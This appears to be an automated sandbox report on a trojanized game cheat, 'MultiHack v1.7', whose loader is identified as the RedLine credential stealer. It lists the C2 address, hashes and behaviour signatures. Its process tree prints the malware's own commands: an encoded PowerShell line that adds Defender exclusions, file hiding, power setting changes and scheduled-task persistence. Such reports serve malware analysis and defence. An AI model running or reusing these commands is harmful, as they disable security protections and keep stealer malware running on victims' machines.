Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/06/2024, 04:32
Static task
static1
Behavioral task
behavioral1
Sample
MultiHack v1.7.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
MultiHack v1.7.zip
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
MultiHack v1.7/Loader.exe
Resource
win7-20240611-en
Behavioral task
behavioral4
Sample
MultiHack v1.7/Loader.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
MultiHack v1.7/README.txt
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
MultiHack v1.7/README.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
MultiHack v1.7/jvm.cfg
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
MultiHack v1.7/jvm.cfg
Resource
win10v2004-20240611-en
Behavioral task
behavioral9
Sample
MultiHack v1.7/scripts/actbusy.txt
Resource
win7-20240419-en
Behavioral task
behavioral10
Sample
MultiHack v1.7/scripts/actbusy.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral11
Sample
MultiHack v1.7/scripts/actremap.txt
Resource
win7-20240220-en
Behavioral task
behavioral12
Sample
MultiHack v1.7/scripts/actremap.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral13
Sample
MultiHack v1.7/scripts/audio_options.txt
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
MultiHack v1.7/scripts/audio_options.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral15
Sample
MultiHack v1.7/scripts/bonus_maps_manifest.txt
Resource
win7-20240508-en
Behavioral task
behavioral16
Sample
MultiHack v1.7/scripts/bonus_maps_manifest.txt
Resource
win10v2004-20240611-en
Behavioral task
behavioral17
Sample
MultiHack v1.7/scripts/bugreporter_defaults.txt
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
MultiHack v1.7/scripts/bugreporter_defaults.txt
Resource
win10v2004-20240611-en
Behavioral task
behavioral19
Sample
MultiHack v1.7/scripts/chapterbackgrounds.txt
Resource
win7-20240508-en
Behavioral task
behavioral20
Sample
MultiHack v1.7/scripts/chapterbackgrounds.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral21
Sample
MultiHack v1.7/scripts/clientmenu.txt
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
MultiHack v1.7/scripts/clientmenu.txt
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
MultiHack v1.7/scripts/controller_options.txt
Resource
win7-20240611-en
Behavioral task
behavioral24
Sample
MultiHack v1.7/scripts/controller_options.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral25
Sample
MultiHack v1.7/scripts/credits.txt
Resource
win7-20240611-en
Behavioral task
behavioral26
Sample
MultiHack v1.7/scripts/credits.txt
Resource
win10v2004-20240611-en
Behavioral task
behavioral27
Sample
MultiHack v1.7/scripts/damagecutout.txt
Resource
win7-20240508-en
Behavioral task
behavioral28
Sample
MultiHack v1.7/scripts/damagecutout.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral29
Sample
MultiHack v1.7/scripts/damagecutout_ceda.txt
Resource
win7-20240508-en
Behavioral task
behavioral30
Sample
MultiHack v1.7/scripts/damagecutout_ceda.txt
Resource
win10v2004-20240611-en
Behavioral task
behavioral31
Sample
MultiHack v1.7/scripts/damagecutout_female.txt
Resource
win7-20240220-en
Behavioral task
behavioral32
Sample
MultiHack v1.7/scripts/damagecutout_female.txt
Resource
win10v2004-20240508-en
General
Target: MultiHack v1.7/Loader.exe
Size: 613KB
MD5: eaf135289c47813fb42ca5c8725a318c
SHA1: b10df8a1ed28477738aa49d13075ae379cee59e4
SHA256: d32338a207e0c9389388cebeb45abe709e4dc6fe02d0f8267b478fd2cfeb1760
SHA512: c9288aee9876d006ce998753785982c086382ecbfaecb0f6fca7e445ce0f42efe3375771e0d9211f3dadcf09476c607584c09038dd970c325cc1d314ccc0abed
SSDEEP: 12288:k55CP3Izb3vmJxMtTCGpZo0kidUBHZ2MErqp4tv/D7YmvDeDidYA7j//GrzS3emc:kqPIHmKTCGDoT
Malware Config
Extracted
redline
@bloodyrain12
147.45.47.93:80
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoCs)
resource | yara_rule
behavioral4/memory/2028-9-0x0000000000420000-0x0000000000472000-memory.dmp | family_redline

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | conhost.exe

Executes dropped EXE (5 IoCs)
pid | Process
4264 | conhost.exe
3364 | 7z.exe
3508 | 7z.exe
1848 | 7z.exe
2676 | Installer.exe

Loads dropped DLL (4 IoCs)
pid | Process
1136 | Loader.exe
3364 | 7z.exe
3508 | 7z.exe
1848 | 7z.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
20 | pastebin.com
21 | pastebin.com

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 1136 set thread context of 2028 | 1136 | Loader.exe | 84

pid | Process
4080 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4524 | schtasks.exe
32 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
pid | Process
2028 | AppLaunch.exe (×3)
2676 | Installer.exe (×9)
4080 | powershell.exe (×2)

Suspicious use of AdjustPrivilegeToken (15 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2028 | AppLaunch.exe
Token: SeRestorePrivilege | 3364 | 7z.exe
Token: 35 | 3364 | 7z.exe
Token: SeSecurityPrivilege | 3364 | 7z.exe (×2)
Token: SeRestorePrivilege | 3508 | 7z.exe
Token: 35 | 3508 | 7z.exe
Token: SeSecurityPrivilege | 3508 | 7z.exe (×2)
Token: SeRestorePrivilege | 1848 | 7z.exe
Token: 35 | 1848 | 7z.exe
Token: SeSecurityPrivilege | 1848 | 7z.exe (×2)
Token: SeDebugPrivilege | 2676 | Installer.exe
Token: SeDebugPrivilege | 4080 | powershell.exe

Suspicious use of WriteProcessMemory (41 IoCs)
description | pid | Process | procid_target
PID 1136 wrote to memory of 2028 | 1136 | Loader.exe | 84 (×8)
PID 2028 wrote to memory of 4264 | 2028 | AppLaunch.exe | 87 (×3)
PID 4264 wrote to memory of 396 | 4264 | conhost.exe | 88 (×2)
PID 396 wrote to memory of 3476 | 396 | cmd.exe | 90 (×2)
PID 396 wrote to memory of 3364 | 396 | cmd.exe | 91 (×2)
PID 396 wrote to memory of 3508 | 396 | cmd.exe | 92 (×2)
PID 396 wrote to memory of 1848 | 396 | cmd.exe | 93 (×2)
PID 396 wrote to memory of 4388 | 396 | cmd.exe | 94 (×2)
PID 396 wrote to memory of 2676 | 396 | cmd.exe | 95 (×3)
PID 2676 wrote to memory of 3380 | 2676 | Installer.exe | 96 (×3)
PID 3380 wrote to memory of 4080 | 3380 | cmd.exe | 98 (×3)
PID 2676 wrote to memory of 4060 | 2676 | Installer.exe | 99 (×3)
PID 2676 wrote to memory of 4584 | 2676 | Installer.exe | 100 (×3)
PID 4584 wrote to memory of 4524 | 4584 | cmd.exe | 103 (×3)

Views/modifies file attributes (1 TTPs, 1 IoCs)
pid | Process
4388 | attrib.exe
Processes
(each entry: image path, command line, matched signatures, PID; indentation shows parent/child nesting)

C:\Users\Admin\AppData\Local\Temp\MultiHack v1.7\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\MultiHack v1.7\Loader.exe"
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1136

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2028

    C:\Users\Admin\AppData\Local\Temp\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4264

      C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      - Suspicious use of WriteProcessMemory
      PID:396

        C:\Windows\system32\mode.com
        mode 65,10
        PID:3476

        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        7z.exe e file.zip -p2644924162377919422435812936 -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        PID:3364

        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        7z.exe e extracted/file_2.zip -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        PID:3508

        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        7z.exe e extracted/file_1.zip -oextracted
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        PID:1848

        C:\Windows\system32\attrib.exe
        attrib +H "Installer.exe"
        - Views/modifies file attributes
        PID:4388

        C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
        "Installer.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID:2676

          C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C powershell -EncodedCommand "PAAjAEIATQBhADUARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEIATQAwAEgAQQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBDADAAUgA3AG4AeAB1AGUAagAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHYAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
          - Suspicious use of WriteProcessMemory
          PID:3380

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAEIATQBhADUARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEIATQAwAEgAQQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBDADAAUgA3AG4AeAB1AGUAagAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHYAQwAjAD4A"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:4080

          C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          PID:4060

            C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            - Creates scheduled task(s)
            PID:32

          C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4415" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          - Suspicious use of WriteProcessMemory
          PID:4584

            C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4415" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            - Creates scheduled task(s)
            PID:4524
Downloads